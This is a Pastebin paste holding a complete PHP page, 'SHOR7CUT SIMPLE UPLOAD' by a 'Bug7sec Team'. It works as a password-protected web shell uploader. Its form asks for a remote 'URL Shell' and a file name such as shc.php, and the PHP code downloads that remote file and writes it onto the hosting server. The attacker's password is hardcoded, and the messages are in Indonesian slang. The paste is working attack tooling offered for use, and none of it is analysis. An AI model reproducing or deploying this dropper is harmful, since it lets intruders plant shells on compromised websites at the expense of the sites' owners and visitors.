Advertisement
galih039

Untitled

Dec 9th, 2017
225
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.82 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>SHOR7CUT | SIMPLE UPLOAD</title>
  5. <meta name="description" content="Shor7cut - Simple Upload | Bug7sec Team"/>
  6. <style type="text/css">
  7. body{
  8. color: #3EF403;
  9. background-color: black;
  10. }
  11. input {
  12. border: dashed 1px;
  13. border-color: #333;
  14. BACKGROUND-COLOR: Black;
  15. font: 8pt Verdana;
  16. color: #0CFF37;
  17. }
  18.  
  19. select {
  20. border: dashed 1px;
  21. border-color: #333;
  22. BACKGROUND-COLOR: Black;
  23. font: 8pt Verdana;
  24. color: #0CFF37;
  25. }
  26. textarea {
  27. margin: 0;
  28. color: #fff;
  29. background-color: #555;
  30. border: 1px solid #df5;
  31. font: 9pt Monospace,'Courier New'; }
  32. </style>
  33.  
  34. </head>
  35. <body>
  36. <pre style="text-align: center">
  37. -[ SHOR7CUT SIMPLE UPLOAD | Bug7sec Team ]-
  38. </pre>
  39. <Center>
  40. <form action="" method="post">
  41. <input type="text" name="shcfile" placeholder="URL Shell">
  42. <input type="text" name="shcname" placeholder="Name Shell" value="shc.php">
  43. <input type="text" name="shcpass" placeholder="Password">
  44. <input type="submit" name="submit" value="SHC UPLOAD"/>
  45. </form>
  46. <?php
  47. error_reporting(0);
  48. $password = "Ganja039@";
  49. if( isset($_POST['shcpass']) && isset($_POST['shcname']) && isset($_POST['shcfile']) && isset($_POST['submit']) == "SHC UPLOAD"){
  50. echo "<br>";
  51. if(md5($password ) == md5($_POST['shcpass'])){
  52. if( file_put_contents($_POST['shcname'], file_get_contents($_POST['shcfile'])) ){
  53. echo '<font color="#0CFF37">Berhasil Cuk!!! <a href="'.$_POST['shcname'].'" target="_blank">Klik</a></font>';
  54. }else{
  55. echo '<font color="red">Gagal Cuk!!!</font>';
  56. }
  57. }else{
  58. echo '<font color="#0CFF37">Capa Yah ? ku g nyal kmuh...</font>';
  59. }
  60. }
  61. ?>
  62. </Center>
  63. </body>
  64. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement